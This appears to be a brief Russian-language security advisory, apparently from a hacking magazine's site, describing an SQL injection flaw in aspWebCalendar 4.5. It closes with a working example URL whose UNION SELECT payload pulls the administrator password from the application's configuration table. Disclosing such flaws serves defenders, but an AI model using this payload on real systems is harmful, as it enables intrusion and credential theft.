Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: aspWebCalendar 4.5
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Пример:
/calendar.asp?action=viewevent&eventid=-1%20union%20select%200,Cal_ConfigId, Cal_ConfigAdminPassword,3,4,5,6,7,8,9%20from%20Cal_config